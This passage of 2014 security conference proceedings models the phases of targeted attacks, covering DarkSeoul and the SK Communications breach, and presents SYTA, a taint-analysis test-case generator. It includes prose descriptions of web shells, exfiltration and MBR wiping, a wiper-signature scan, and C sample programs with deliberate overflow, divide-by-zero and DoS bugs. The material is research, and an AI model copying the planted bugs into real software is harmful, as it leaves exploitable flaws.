database-related tools and terminal programs for remote
control. They then check the database and logs on the
mainframe computer. As a result, they gain control of the
targeted system and obtain information. Sometimes, attackers
acquire critical information and control the targeted system
by monitoring the infected PCs with Virtual Network
Computing (VNC). After accessing the infected PCs, they
install a VNC program. If administrators or developers use
the infected PCs, the attackers can watch what they do through
VNC. As a result, they can control the targeted system and
acquire critical information. Attackers can acquire control of
the target system by uploading a web-shell, a web script file
(e.g., asp, jsp, php, and sci), usually crafted maliciously in
order to run instructions on the targeted web server remotely
[8]. First, they make a web script file and upload it to a local
web-board.
web-board. After searching a URL enabling them to move
134
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 2. Mapping result of the 3.20 cyber-attack through behavior-based modeling map
into the uploading location using file attributes, they access
the shell by entering this URL, and then obtain some
system information by using commands. Additionally,
attackers connect the infected PCs to themselves or to C&Cs
to send instructions or additional malicious codes to the
infected PCs, or to receive the targeted system's information
from them. After getting control of the system, they send
instructions or additional malicious codes to the infected PCs
or receive the targeted system's information by way of the C&Cs.
Attackers can spread malicious codes using an updating
server containing falsified updating software; all PCs with
automatic updates activated can be infected. They can also
trigger infection with malicious codes by adding falsified
web pages or banners that users can access and click on.
They add web pages or banners containing malicious
codes to the target web server, and then, when users visit the
targeted web site, their PCs are infected.
D. The Achievement Phase
In this phase, attackers can acquire critical information
by copying files with remote commands or by using web-mails
or encrypted packets. They can also incapacitate systems by
destroying the Master Boot Record (MBR)/Volume Boot
Record (VBR), for example, or shut systems down using
automatic termination or remote starting.
Attackers can control infected PCs and exfiltrate critical
files from them using a remote command, such as scp, or
web-mails. They can also encrypt packets of critical data using
packet-extracting commands/tools and take them. Attackers
run destruction commands against the MBR/VBR of infected
PCs and preclude system booting. Additionally, they can seize
subsequent decisive opportunities by monitoring and
analyzing infected PCs. Sometimes, attackers terminate the
targeted system using commands for the automatic termination
of specific software or hardware, or shut the targeted system
down using commands for remote starting.
III. MODELLING FOR REAL CASES
We applied our behavior-based model to two real
targeted attacks. One occurred in July 2011 and the
other occurred on March 20, 2013.
Figure 3. Mapping result of the Targeted Attack for SK Communications through behavior-based modeling map
A. Modelling for the 3.20 South Korean Malware Attack
The attack, dubbed DarkSeoul, against South Korean
media and banking organizations severely disrupted a
handful of organizations with a coordinated distribution of
“wiper” malware designed to destroy data on hard drives and
render them unbootable [9]. It is known that the malware
overwrites the MBR and VBR. The records and files
overwritten by the malware so far have been wiped with
the patterns 'HASTATI' or 'PR!NCPES'. We referenced some
analysis reports and describe the detailed process of this
attack as follows [10]. We mapped the 8 steps of this attack to
the potential behaviors we categorized. Figure 2 depicts the
mapping result of the 3.20 cyber-attack.
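The reported 'HASTATI'/'PR!NCPES' overwrite patterns give a simple forensic signature. The sketch below is a hypothetical illustration (the scan function and sample buffer are invented): it checks a raw disk-image buffer for either pattern, the kind of check an analyst might run when triaging a suspected 3.20 wiper victim.

```python
# Hypothetical sketch: scan a raw disk-image buffer for the wiper's
# overwrite patterns ('HASTATI', 'PR!NCPES') reported for 3.20 DarkSeoul.
SIGNATURES = [b"HASTATI", b"PR!NCPES"]

def find_wiper_patterns(image: bytes):
    """Return the signature strings present in the buffer."""
    return [sig.decode() for sig in SIGNATURES if sig in image]

# Invented sample: zeroed sectors with a repeated HASTATI overwrite.
sample = b"\x00" * 512 + b"HASTATI." * 4 + b"\x00" * 64
print(find_wiper_patterns(sample))  # ['HASTATI']
```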
1. An attacker secures C&Cs using vulnerabilities of web-boards or web-mails.
2. The attacker falsifies the (C&C #1 and C&C #2) web-server and uploads malicious code #1.
3. A user (User #1) accesses the falsified web-server and is infected with malicious code #1.
4. User #1 sends his file-list to C&C #1 and receives and runs malicious code #2.
5. User #1 is infected with malicious code #2 and performs port-scanning.
6. User #1 sends the results of port-scanning and downloads/runs malicious codes #3 and #4.
7. With malicious codes #3 and #4, User #1 acquires authority over the Patch Management System (PMS) server and uploads a malicious code for system destruction.
8. Other users update their vaccine programs, and their hard-disks break down.
B. Modeling for the Targeted Attack on SK Communications
Between 18 and 25 July 2011, attackers infected over 60
SK Communications computers and used them to gain
access to the user databases. They infected these computers
by first compromising a server belonging to a South Korean
software company that was used to deliver software updates to
customers (including SK Communications). The attackers
modified the server so that the SK Communications
computers would receive a trojaned update file when they
conducted their routine checks for software updates [11]. We
mapped the 5 steps of this attack to the potential behaviors we
categorized. Figure 3 depicts the mapping result of the
targeted attack on SK Communications.
1. An attacker hacks the Alzip update server and uploads a malicious code through accessing backdoors [12].
2. A user updates the Alzip program and unknowingly downloads a malicious code from the redirecting server.
3. A key-logger is installed on that user's computer, and the user's password can be logged when he uses it to access the database.
4. The attacker requests and receives the key-logging information.
5. The attacker orders the database to be dumped and sent, and obtains it via the key-logger on the user's PC.
This proposed involvers' behavior-based model of cyber
targeted attacks can be useful in the following cases.
First, attack methods are very diverse, so our model can
serve as a basic yardstick for deciding whether an attack is a
cyber targeted attack or not. Second, a cyber targeted
attack generally occurs over a long period of time; if some
behaviors related to a cyber targeted attack are found in its
middle stages, the subsequent potential behaviors can be
prevented in advance by referencing our model. Third, if
some attack behaviors are found in the middle or
final stages, we can infer what happened in the beginning
stages using our model. Fourth, since our model includes
analysis points at each phase, it can be a guidance map for
analyzing the causes of hacking incidents; if cause analysis
can be performed rapidly, services delayed by a hacking
incident can be restored faster. Finally, according to the 44
methods of our model, detailed analyses of the devices related
to the involvers can be done.
IV. CONCLUSION AND FUTURE WORK
We categorized cyber targeted attacks into 4 steps and
defined potential behaviors of involvers, such as attackers and
victims, in order to build a model. Each behavior of our
model can include several methods. Furthermore, we
applied our behavior-based model to the real targeted attacks,
“3.20 South Korean Malware Attack” and “The Targeted
Attack for SK Communications”, and described use cases.
For testing, we are building a cyber hacking test-bed
including routers, switches, servers, PCs, and notebooks. We
plan to make some APT scenarios similar to real
targeted attacks like DarkSeoul, and implement them on the
cyber hacking test-bed to verify our model.
REFERENCES
[1] N. Virvilis and D. Gritzalis, “The big four-what we did wrong in protecting critical ICT infrastructures from Advanced Persistent Threat detection?,” The Eighth International Conference on Availability, Reliability & Security (ARES 2013), IEEE Press, Sep. 2013, pp. 248-254, doi:10.1109/ARES.2013.32.
[2] W. Gary and S. Zhendong, “Sound and precise analysis of web applications for injection vulnerabilities,” Conference on Programming Language Design and Implementation (PLDI 2007), ACM, Jun. 2007, pp. 32-41, ISBN: 978-1-59593-633-2.
[3] M. Michael and L. Monica, “Automatic generation of XSS and SQL injection attacks with goal-directed model checking,” Proc. of the Conference on Security Symposium (SS 2008), USENIX Association Berkeley, Jul. 2008, pp. 31-43.
[4] C. Harlan and A. Cory, “Tracking USB storage: Analysis of windows artifacts generated by USB storage devices,” Digital Investigation, vol. 2, Jun. 2005, pp. 94-100, doi:10.1016/j.diin.2005.04.006.
[5] S. Zhendong and W. Gary, “The essence of command injection attacks in web applications,” Conference record of the 33rd ACM SIGPLAN-SIGACT Symposium on Principles of Programming Languages (POPL 2006), ACM, Jan. 2006, pp. 372-382, ISBN: 1-59593-027-2.
[6] W. Halfond, J. Viegas, and A. Orso, “A classification of SQL-injection attacks and countermeasures,” Proc. of the IEEE International Symposium on Secure Software Engineering, IEEE, Mar. 2006, pp. 13-15.
[7] S. Gaspers and S. Stefan, “Backdoors to Satisfaction,” The Multivariate Algorithmic Revolution and Beyond, Springer Berlin Heidelberg, pp. 287-317, Nov. 2012, ISBN: 978-3-642-30890-1.
[8] A. Straniery and Z. John, “WebShell: The development of web based expert systems,” Research and Development in Intelligent Systems XVIII, Springer London, Dec. 2001, pp. 245-258, ISBN: 978-1-85233-535-9.
[9] US-CERT, “South Korean Malware Attack,” 2013, URL: https://www.us-cert.gov/sites/default/files/publications [Retrieved: Oct. 2014].
[10] IssueMakersLab, “Operation 1Mission aka 3.20 DarkSeoul,” URL: http://www.issuemakerslab.com [Retrieved: Oct. 2014].
[11] L. Moon-young, “Personal Information Hack Traced to Chinese IP address,” The Hankyoreh Media Company, 2011, URL: http://english.hani.co.kr/arti/english_edition/e_national/491514.html [Retrieved: Oct. 2014].
[12] Altools, URL: http://www.altools.com [Retrieved: Oct. 2014].
Test Case Generation Assisted by Control Dependence Analysis
Puhan Zhang
China Information
Technology Security
Evaluation Center
Beijing, China
zhangph2008@gmail.com
Qi Wang
Renmin University of China
Beijing, China
China Telecom Corporation
Beijing Company
Beijing, China
wangq@163.com
Abstract—This paper proposes and develops a new test case
generation tool named Symbolic Execution & Taint Analysis
(SYTA) that can capture implicit information flows by control
dependence analysis. When running, SYTA traces execution
paths to track constraints on symbolic variables. Equivalence
relationship assertions are constructed to store the
equivalence information among variables for control
dependence analysis. If a security sink is reached, SYTA
builds a constraint from the path conditions and equivalence
relationship assertions, which are sent to a constraint
solver. Test cases are then generated from possible
counterexamples found during constraint solving. Compared with
traditional static analysis tools, SYTA can track implicit
information flows and generate test cases by control
dependence analysis effectively.
Keywords-test case generation; control dependence; implicit
information flow; symbolic execution
I. INTRODUCTION
Nowadays, test case generation has become one of the most
important steps of code testing, and it is usually realized by
the symbolic execution approach. If a bug exists, the
test cases can help programmers find the spot that causes
the error.
A traditional Fuzzing approach is a form of black-box
testing which randomly mutates well-formed inputs and uses
these variants as test cases [1][2]. Although Fuzzing can be
remarkably effective, its limitations are that it
usually provides low code coverage and cannot drive deeper
into programs, because blind modification destroys the
structure of inputs [3]. In a security context, these limitations
mean that potentially serious security bugs, such as buffer
overflows, may be missed because the code containing
the bugs is not even exercised.
Combining general static analysis with taint analysis to test applications and derive test cases is currently an intensely studied technique; TaintScope [6] is one example. Taint analysis lets a user define taint sources, propagates the taint during execution following a specific propagation policy, and finally triggers a particular operation if a predetermined security sink is hit.
Copyright (c) IARIA, 2014. ISBN: 978-1-61208-376-6

Guowei Dong, China Information Technology Security Evaluation Center, Beijing, China (dgw2008@163.com)
Bin Liang and Wenchang Shi, School of Information, Renmin University of China, Beijing, China ({liangb, wenchang}@ruc.edu.cn)

Unfortunately, this smart Fuzzing technique has many pitfalls [4], among which missing implicit information flows is the most critical one. In contrast to explicit information flows, which are caused by direct assignments, implicit information flows consist of information leakage through control dependence. The
example shown in Figure 1 discloses the nature of implicit information flows. There is no direct assignment between variables h and l in the sample program, but l is set to the value of h after the if-then-else block through control dependence. Even though attention to, and the definition of, the implicit-flow problem dates back to the 1970s [5], no effective solution has been found. Some newly developed tools, such as TaintScope [6], sidestep implicit information flows and limit their analysis to explicit information flows, which incurs the following three problems:
- Missing implicit information flows may lead to an under-tainting problem and false negatives. As a result, security vulnerabilities caused by control dependence will not be detected. Capturing implicit flows is especially critical in privacy leak analysis.
- Control dependence is also a common programming pattern in benign programs. For example, some routines in a Windows program may use a switch structure to convert internal codes to Unicode, as in the following code segment: switch(x){ case a: y = a; break; case b: y = b; break; ……}. This indicates that analyzing implicit information flows is necessary for common software testing.
- To counter anti-taint-analysis techniques, implicit information flows must be analyzed effectively [7]. Malware can employ control dependence to propagate sensitive information so as to bypass traditional taint analysis.
To address these limitations and generate test cases with tainting techniques, we propose and develop a new tool called Symbolic Execution & Taint Analysis (SYTA), which generates test cases while taking implicit information flows into account. Compared with traditional static analysis tools, SYTA can track implicit information flows and generate test cases
1: h := h mod 2;
2: if h = 1 then
3:   l := 1;
4: else
5:   l := 0;
6: end if
Figure 1. A sample program of implicit information flow
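To make the Figure 1 pattern concrete, the following Python sketch (ours, not part of SYTA) shows that l always ends up equal to h mod 2 even though no statement ever assigns h to l:

```python
# Executable rendering of the Figure 1 pseudocode: the value of h
# reaches l purely through the branch condition (control dependence).
def leak(h):
    h = h % 2
    if h == 1:
        l = 1
    else:
        l = 0
    return l

# l reproduces h mod 2 although no assignment "l := h" exists anywhere
assert all(leak(h) == h % 2 for h in range(10))
```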
by control dependence analysis effectively. Though it is hard to say what percentage of a program can be classified as implicit information flow, analyzing it may reveal vulnerabilities that explicit information flow analysis cannot.
The rest of the paper is organized as follows. Section 2
briefly analyzes the target problem. Section 3 discusses our
methodology and design of SYTA. Section 4 evaluates our
approach. Section 5 summarizes related work. Finally,
Section 6 concludes the paper and discusses future-work
directions.
II. PROBLEM ANALYSIS
This section describes the problem we address by walking the reader through the testing of the sample program shown in Figure 3 (a). Despite its small size, it illustrates the most common characteristics of implicit information flows. The sample program contains three bugs related to control dependence.
1) Array bound overflow in line 29. The program implies that variable k will be equal to variable i under a specific condition. If the user assigns 2 to i, k will be set to 2 through four control branches: three if statements and one loop. In line 28, the value to which pointer p points becomes 4. Eventually, an array bound overflow is triggered when *p is dereferenced as the index of array a in line 29.
2) Divide-by-zero in line 30. If the user assigns 3 to variable i, then through several control branches *p is set to 0 in line 28, and the divisor t becomes 0 in line 30.
3) Denial of service in line 31. If 1 is assigned to variable i, a denial-of-service (DoS) condition may occur at line 31.
Traditional analysis tools cannot generate test cases for the above bugs because they lack control dependence analysis. Take EXE [8] and KLEE [9] as examples: they are based entirely on explicit information flow analysis. When applied to the sample program, even though variable i is symbolically executed and analyzed, those tools cannot produce effective test cases, because there are no direct assignment relationships between i and the other variables, such as k, t, and p.
Our solution is to take implicit information flows into consideration, so that taint is propagated from variable i to variables j, tmp, and k (in lines 18, 25, and 30 of the source code, respectively). Variable p in line 33 is then tainted through the data flow, which makes it possible to identify the bugs and automatically obtain the test cases that hit them.
III. METHODOLOGY
SYTA, as a test case generator, functions as a combination of an intermediate-language interpreter, a symbolic execution engine, and a taint analyzer. During each symbolic execution, several lists are built to store information for taint propagation. Test programs are first parsed by a compiler front-end and converted to an intermediate language. The corresponding Control Flow Graphs (CFGs) are constructed as the inputs of SYTA. SYTA will traverse
Figure 2. The architecture of SYTA. (The user supplies taint sources and source code; GCC produces the CFG consumed by SYTA; SYTA queries STP, an SMT solver, and outputs test cases.)
each CFG and run symbolic execution, performing two kinds of taint propagation, collecting symbolic path conditions, recording the equivalence information among variables, and eventually generating Satisfiability Modulo Theories (SMT) constraints. An SMT solver is employed to solve and check these constraints to detect potential bugs. If bugs are found, test cases are generated and reported.
A. Overview
The core of SYTA is an interpreter loop that selects a path, composed of basic blocks and directed by the edges of the CFG, symbolically executes each statement of the basic blocks, and performs two kinds of taint propagation (explicit and implicit). The loop continues until no basic blocks remain, and test cases are generated if bugs are hit. The architecture is illustrated in Figure 2.
For the two kinds of taint analysis, we maintain an Explicit Information Flow Taint (EFT) list and an Implicit Information Flow Taint (IFT) list. In addition, an Equivalence Relationships (ER) list is maintained to record equivalence information among variables in condition statements for control dependence analysis.
At the very beginning of testing, users appoint the variables of interest as taint sources, which are recorded in the EFT and IFT lists in the proper forms. The two lists follow the different taint propagation policies that we design for explicit and implicit information flows, respectively.
When a security sink is encountered, SYTA invokes an SMT solver to carry out a query concerning the operation related to the current security sink. The current path conditions and the expressions drawn from the ER list act as the context of the query, namely, the assertions for solving. By running the query, SYTA checks whether any input value exists that may cause a bug. If a bug is detected, the SMT solver produces a counterexample that serves as a test case to trigger the bug.
B. Implicit Information Flow Taint Propagation
The intuition behind taint propagation over implicit information flows can be illustrated with the sample program shown in Figure 4.
In this sample program, a conditional branch statement br, namely if (i >= 4) in line 5, decides which statement st is executed (j = 5 in line 6 or j = 0 in line 9). The value of i affects the value of j. Therefore, based on control dependence, the taint state should be propagated from the source operand of br, the variable i, to st's destination operand, the variable j. To achieve this, SYTA needs to compute and record post-dominance relationships at the basic-block level before symbolic execution.
First, the user appoints variables as taint sources, and SYTA calculates the immediate post-dominator basic block of each basic block containing a taint source. The pair <i, ipdom_bb> is then inserted into the IFT list, where i stands for the tainted variable and ipdom_bb denotes the immediate post-dominator basic block of the current basic block.
During path traversal, when a basic block is reached, SYTA compares it with all the ipdom_bbs in the control-flow-based taint pairs in the IFT list, finds the matches, and removes the matching pairs. After removal, if the IFT list is not empty, the ipdom of the current basic block is calculated and taint pairs are formed with every variable v defined in the current basic block. These pairs are added to the IFT list one by one. In other words, if the target variable i is marked as tainted, the variables in the current basic block will also be marked as tainted according to the control dependence relationship. No further operations are performed if the
 1: void main(void) {
 2:   unsigned int i;
 3:   unsigned int t;
 4:   int a[4] = { 1, 3, 5, 1 };
 5:   int *p;
 6:   int tmp;
 7:   int j;
 8:   int k;
 9:   int x = 100;
10:   scanf("%d", &i);
11:   if(i >= 4){
12:     j = 5;
13:   }
14:   else{
15:     j = 0;
16:   }
17:   for(j; j < 4; j++)
18:   {
19:     tmp = 1;
20:     if( j != i){
21:       tmp = 0;
22:     }
23:     if (tmp == 1){
24:       k = j;
25:     }
26:   }
27:   p = a + k;
28:   *p = *p - 1;
29:   t = a[*p] - 1;
30:   t = x / t;
31:   sleep(t*10000);
32: }
IFT list is empty, in which case only the explicit information flow taint propagation goes on.
In a CFG, a basic block m post-dominates a basic block n if all directed paths from n to the exit basic block pass through m. If, in addition, there is no node o such that m post-dominates o and o post-dominates n, we say that m immediately post-dominates n (m ipdom n). In Figure 4, BB5 ipdom BB2.
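As an illustration of how the ipdom relation can be computed, the following Python sketch runs the textbook iterative data-flow algorithm on the Figure 4 CFG (this is our own sketch, not SYTA's actual implementation; the node names follow the paper):

```python
# Iterative post-dominance computation on the Figure 4 CFG.
succ = {
    "entry": ["BB2"],
    "BB2": ["BB3", "BB4"],   # if (i >= 4)
    "BB3": ["BB5"],          # j = 5
    "BB4": ["BB5"],          # j = 0
    "BB5": ["exit"],         # z = j
    "exit": [],
}
nodes = list(succ)

# pdom[n] = {n} union the intersection of pdom(s) over successors s of n
pdom = {n: set(nodes) for n in nodes}
pdom["exit"] = {"exit"}
changed = True
while changed:
    changed = False
    for n in nodes:
        if n == "exit":
            continue
        new = {n} | set.intersection(*(pdom[s] for s in succ[n]))
        if new != pdom[n]:
            pdom[n] = new
            changed = True

def ipdom(n):
    # the immediate post-dominator is the strict post-dominator closest
    # to n, i.e., the one whose own pdom set is largest
    strict = pdom[n] - {n}
    return max(strict, key=lambda d: len(pdom[d]))

print(ipdom("BB2"))  # BB5, matching "BB5 ipdom BB2" above
```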
Take the program in Figure 4 (a) as an example again; its CFG and post-dominance tree are shown in Figure 4 (b) and (c), respectively. Assume that variable i is chosen as the taint source. At first, the IFT list is initialized to be empty. When line 5 is executed, SYTA identifies the current statement as a condition statement. The corresponding ipdom is BB5, so the pair <i, BB5> is added to the IFT list. The symbolic execution forks here and finds that both paths are feasible. The true branch is executed first and line 6 is reached. At this point, the current basic block is BB3 and there is no matching pair in the IFT list, so the destination operand of the statement, the left-value j, is added to the IFT list together with its ipdom BB5, in the form <j, BB5>. Both pairs are removed when line 11 is reached, because BB5 matches each of them.
C. Explicit Information Flow Taint Propagation
Explicit information flow taint propagation is quite
straightforward compared with the implicit one. Only direct
data dependence, such as assignment operations, needs to be
Note: BB5 is a dummy basic block that does not perform any operation; it is introduced for ease of analysis.
Figure 3. The source code (a) and CFG (b) of the sample program under testing. The CFG consists of BB0 (entry), BB1 (initialization of array a), BB3 (j = 5), BB4 (j = 0), BB5 (dummy), BB11 (if j <= 3), BB6 (tmp = 1; if j != i), BB7 (tmp = 0), BB8 (if tmp == 1), BB9 (k = j), BB10 (j = j + 1), and BB12 (p = a+k; *p = *p - 1; t = a[*p]-1; t = x/t; sleep(t*10000)).
 1: void foo (unsigned int i)
 2: {
 3:   unsigned int j;
 4:   long z;
 5:   if(i >= 4){
 6:     j = 5;
 7:   }
 8:   else {
 9:     j = 0;
10:   }
11:   z = j;
12: }
Figure 4. (a) A fragment of the sample program in Figure 3; (b) its CFG: entry -> BB2 (if(i >= 4)) -> BB3 (j = 5) or BB4 (j = 0) -> BB5 (z = j) -> exit; (c) its post-dominator tree.
considered in taint propagation.
When an assignment statement is encountered, SYTA checks whether the operands on the right-hand side of the statement are included in the EFT list. If so, SYTA inserts the left operand into the EFT list.
In addition, when new pairs are added to the IFT list, the corresponding variables of those pairs should also be inserted into the EFT list. This approach is adopted because the information flow among variables may alternate between the two forms, a problem that is generally ignored. Consider the case in Figure 4 again: there is no explicit information flow from variable i; there is only an implicit information flow from i to variable j, caused by the if-then-else clause. The information flow from j to variable z in line 11, however, is explicit. If the two kinds of information flows were processed separately, then in line 11 the variable z would not be tainted, because j is tainted only through the implicit information flow. As a result, z would carry no taint markings, which leads to false negatives, because the value of z is influenced by i.
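The coupling between the two lists can be sketched as follows (a minimal Python illustration of our reading of this section; the helper names are ours, not SYTA's):

```python
# Mixed implicit/explicit propagation on the Figure 4 fragment.
EFT, IFT = {"i"}, set()          # i is the appointed taint source

def on_branch(cond_vars, branch_defs):
    # implicit flow: a tainted branch condition taints the variables
    # defined inside its branches; they enter BOTH lists (the key step)
    if EFT & set(cond_vars):
        IFT.update(branch_defs)
        EFT.update(branch_defs)

def on_assign(dst, src_vars):
    # explicit flow: plain data dependence through assignment
    if EFT & set(src_vars):
        EFT.add(dst)

on_branch(["i"], ["j"])   # if (i >= 4) { j = 5; } else { j = 0; }
on_assign("z", ["j"])     # z = j;
print("z" in EFT)         # True: without the coupling, z would stay clean
```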
D. Test Case Generation
In KLEE, the context of constraint solving contains only path conditions. In order to capture implicit information flows, the indirect equivalence relationships between variables are also identified by SYTA and sent to the SMT solver as assertions. Take the program in Figure 3 as an example: there exists an implicit equivalence relationship between k and j (i.e., k == j) after executing line 24. When the branch condition in line 20 is not satisfied, both relationships j == i and k == j hold after line 24. SYTA records both equivalent variable pairs in the ER list rather than only the one explicit pair (i.e., j == i).
When a security sink is encountered, two kinds of assertions are sent to the SMT solver as the context: one is the path condition of the current path; the other is a Conjunctive Normal Form (CNF) formula formed from the pairs in the ER list. Consider the CFG in Figure 3 (b), which is expressed in the intermediate language. When the execution path is (BB0 -> BB1 -> BB4 -> BB5 -> BB11 -> BB6 -> BB8 -> BB9 -> BB10 -> BB11 -> BB12), the current security sink is a reference to array a. At this time, the path condition is (i <= 3 && j <= 3 && j == i && tmp == 1 && j(1) >= 3), where j(1) is an alias of variable j; the assertion drawn from the ER list is (k == i). All these expressions are set as assertions for the SMT solver. The query submitted is (*p >= 0 && *p <= 3). The counterexample the SMT solver provides is (i = 2; j = 2; *p = 4). The test case is (i = 2).
Three kinds of bugs are considered in SYTA: (1) array bound overflow, (2) divide-by-zero, and (3) denial-of-service.
(1) If the index variable in a reference to an array is marked as tainted, a query (index >= 0 && index <= upperbound - 1) is constructed and sent to the SMT solver. Under the current context, an array bound overflow exists if all the constraints are satisfiable but the query is not.
(2) If the operation is a division and the divisor m is tainted, the sink query (m != 0) is constructed and sent to the SMT solver together with all the assertions gathered so far. A divide-by-zero exists if all the constraints are satisfiable but the query is not.
(3) When the function sleep is called and its parameter is marked as tainted, the query (sleep <= 10000) is constructed and sent to the SMT solver together with all the assertions. A DoS bug exists if all the constraints are satisfiable but the query is not.
In short, when SYTA encounters a security sink, it gathers all the path conditions preceding the current statement and the assertions from the ER list, and the query is sent to the SMT solver. If the query is unsatisfiable, a test case is generated and reported together with the bug name.
Based on the above discussion, as shown in Table I,
three test cases are generated to detect bugs in the sample
program in Figure 3. They can be used to trigger the array
bound overflow, divide-by-zero and DoS bugs, respectively.
TABLE I. TEST CASES OF THE SAMPLE PROGRAM BY SYTA

Taint Source | Tainted Variables      | Vulnerability Type
i = 2;       | j = 2; *p = 4;         | array bound overflow
i = 3;       | j = 3; *p = 1; t = 0;  | divide-by-zero
i = 1;       | j = 1; *p = 2; t = 25; | denial-of-service
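These rows can be checked by concretely replaying the Figure 3 program. The Python sketch below (an illustrative re-implementation of ours, not SYTA output) mimics the C semantics closely enough to show each test case reaching its bug:

```python
# Concrete replay of the Figure 3 sample program.
def run(i):
    a = [1, 3, 5, 1]
    x = 100
    j = 5 if i >= 4 else 0         # lines 11-16
    k = 0                          # k is uninitialized in the C code;
                                   # 0 is assumed here for the sketch
    while j < 4:                   # lines 17-26
        tmp = 1
        if j != i:
            tmp = 0
        if tmp == 1:
            k = j                  # implicit dependence on i
        j += 1
    a[k] = a[k] - 1                # lines 27-28: p = a + k; *p = *p - 1
    idx = a[k]
    if not 0 <= idx <= 3:
        return "array bound overflow"   # line 29 sink
    t = a[idx] - 1
    if t == 0:
        return "divide-by-zero"         # line 30 sink
    t = x // t
    if t * 10000 > 10000:
        return "denial-of-service"      # line 31 sink
    return "no bug"

print(run(2))  # array bound overflow
print(run(3))  # divide-by-zero
print(run(1))  # denial-of-service
```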
E. Implementation
As shown in Figure 2, we employ GCC 4.5.0 as the compiler front-end of SYTA. Source code is parsed and converted to the GIMPLE intermediate representation, and the CFGs are also built by leveraging GCC. SYTA is implemented as a GCC pass, so the analysis is performed at the GIMPLE level. Finally, we chose the commonly used constraint solver STP [16] as the SMT solver in SYTA.
IV. EVALUATION
We illustrate two cases that show how SYTA detects errors. In the program shown in Figure 5, the control dependence relationships are based on a switch-case structure. During analysis, we leverage the GIMPLE intermediate representation of GCC to process the switch-case structure; in GIMPLE, a switch-case is treated as a normal if-else structure. When the original taint source is variable n, a counterexample (n = 245) can be obtained, and the
void foo(int n)
{
  unsigned int y[256];
  unsigned int x[256];
  for(int i = 0; i < 256; i++)
  {
    y[i] = (char)i;
  }
void foo(int h)
{
  int a[5] = {1, 2, 3, 4, 5};
  int l = 10;
  int k = 0;
  if(h < 0){
    l = 0;
  }
  while(l != 0){
    if(l <= 5){
      k++;
    }
    l--;
  }
  l = a[k];
}
Figure 6. The second case study
assignment statement (n = y[n] / x[n-1];) may trigger a divide-by-zero bug.
In the program shown in Figure 6, there is no explicit else branch in the if (h < 0) statement. In order to capture the taint propagation through the missing else branch, an auxiliary else branch containing a dummy statement (l = l) is inserted into the intermediate representation. Using this dummy statement, a counterexample (h = 2) is found as the test case for the array bound overflow bug at the last statement.
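A quick concrete replay of Figure 6 (again a Python sketch of ours) confirms the counterexample: for any non-negative h the loop drives k to 5, so a[k] reads one past the end of a[5]:

```python
# Replay of the Figure 6 program; returns the final index k used at
# the sink statement l = a[k].
def foo(h):
    l = 0 if h < 0 else 10   # the inserted dummy else arm (l = l)
                             # leaves l at 10 on the h >= 0 path
    k = 0
    while l != 0:
        if l <= 5:
            k += 1           # increments for l = 5, 4, 3, 2, 1
        l -= 1
    return k

print(foo(2))   # 5: out of bounds for int a[5] (valid indices 0..4)
print(foo(-1))  # 0: the h < 0 path stays in bounds
```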
In this paper, we extend the test case generation technique to cover implicit information flows rather than only explicit information flows. In theory, it is impossible to track and analyze all forms of implicit information flows. Our study shows that some typical forms of implicit information flows can be effectively tracked to support test case generation. In this section, we employ two proof-of-principle samples to demonstrate SYTA's ability to track typical forms of implicit information flows. We also use KLEE (with LLVM v2.7) to analyze the two samples and the program shown in Figure 3 (a). As shown in Figure 7, KLEE provides only two test cases (i.e., i = 1 and i = 2147483648) for the feasible execution paths of the program in Figure 3 (a), but these cases cannot trigger and report the array bound overflow and divide-by-zero vulnerabilities. Nevertheless, frankly
  for(int j = 0; j < n; j++)
  {
    switch(y[j])
    {
      case 0:
        x[j] = 13;
        break;
      case 1:
        x[j] = 14;
        break;
      case 2:
        x[j] = 15;
        break;
      ……
      case 256:
        x[j] = 12;
        break;
    }
  }
  n = y[n]/x[n-1];
}
Figure 5. The first case study
Figure 7. The KLEE analysis result for the program in Figure 3(a)
speaking, analyzing a large-scale real-world system will require much more computing overhead.
V. RELATED WORK
Even though attention to, and the definition of, implicit information flow dates back to the 1970s, no effective solution has been found. Many newly developed tools, like TaintScope [6], sidestep the implicit information flow problem and limit their applications to explicit information flows. Some other work limits the processing of control dependence to predetermined forms. For example, Heng Yin et al. handle API functions containing control dependence specially in their tool Panorama [11]; the system designed by Wei Xu et al. [12] processes only two specific kinds of control flow; and Dongseok Jang et al. [13] process only the branching rather than the whole program, leading to low coverage and false negatives.
Some dynamic analysis testing tools are more comprehensive. Dytan [10], by James Clause et al., can construct implicit information flows on binary code but cannot obtain control dependence information from indirect jump instructions. DTA++, developed by Min Gyung Kang et al., traces information-preserving implicit information flows [14], but its simple dichotomy approach is too coarse and may cause an under-tainting problem.
VI. CONCLUSION AND FUTURE WORK
We presented a static analysis tool, SYTA, capable of automatically generating test cases using symbolic execution and taint analysis techniques. Using the control flow graph of the target program and user-appointed taint sources as inputs, SYTA follows execution paths to track the constraints on symbolic variables and maintains two taint lists, for explicit and implicit information flows respectively. Test cases are generated from the counterexamples produced during constraint solving. Compared with traditional static analysis tools, SYTA can track implicit information flows and generate test cases effectively through control dependence analysis.
At present, in tracking implicit information flows, SYTA covers only three kinds of sink points, concerning array bound overflow, divide-by-zero, and denial-of-service, respectively. By expanding the taint source points and sink points, it could cover other kinds of vulnerabilities related to tainted data. For example, by regarding untrusted input interface functions as taint source points and functions such as memcpy as sink points, it could detect buffer overflow vulnerabilities caused by ineffective input validation.
ACKNOWLEDGMENT
The authors would like to thank the anonymous reviewers for their insightful comments that helped improve the presentation of this paper. The work has been supported in part by the National Natural Science Foundation of China (61070192, 61170240, 61272493, 61100047), the Natural Science Foundation of Beijing (4122041), the National Science and Technology Major Project of China (2012ZX01039-004), and the National High Technology Research and Development Program of China (2012AA012903).

REFERENCES
[1] D. Bird and C. Munoz, "Automatic Generation of Random Self-Checking Test Cases," IBM Systems Journal, vol. 22, no. 3, 1983, pp. 229-245.
[2] Protos, web page: http://www.ee.oulu.fi/research/ouspg/protos/ [retrieved: August, 2014].
[3] J. Offutt and J. Hayes, "A Semantic Model of Program Faults," in Proceedings of ISSTA '96 (International Symposium on Software Testing and Analysis), San Diego, January 1996, pp. 195-200.
[4] E. J. Schwartz, T. Avgerinos, and D. Brumley, "All you ever wanted to know about dynamic taint analysis and forward symbolic execution (but might have been afraid to ask)," in Proceedings of the IEEE Symposium on Security and Privacy, May 2010, pp. 317-331.
[5] D. E. Denning and P. J. Denning, "Certification of programs for secure information flow," Communications of the ACM, vol. 20, no. 7, July 1977, pp. 504-513.
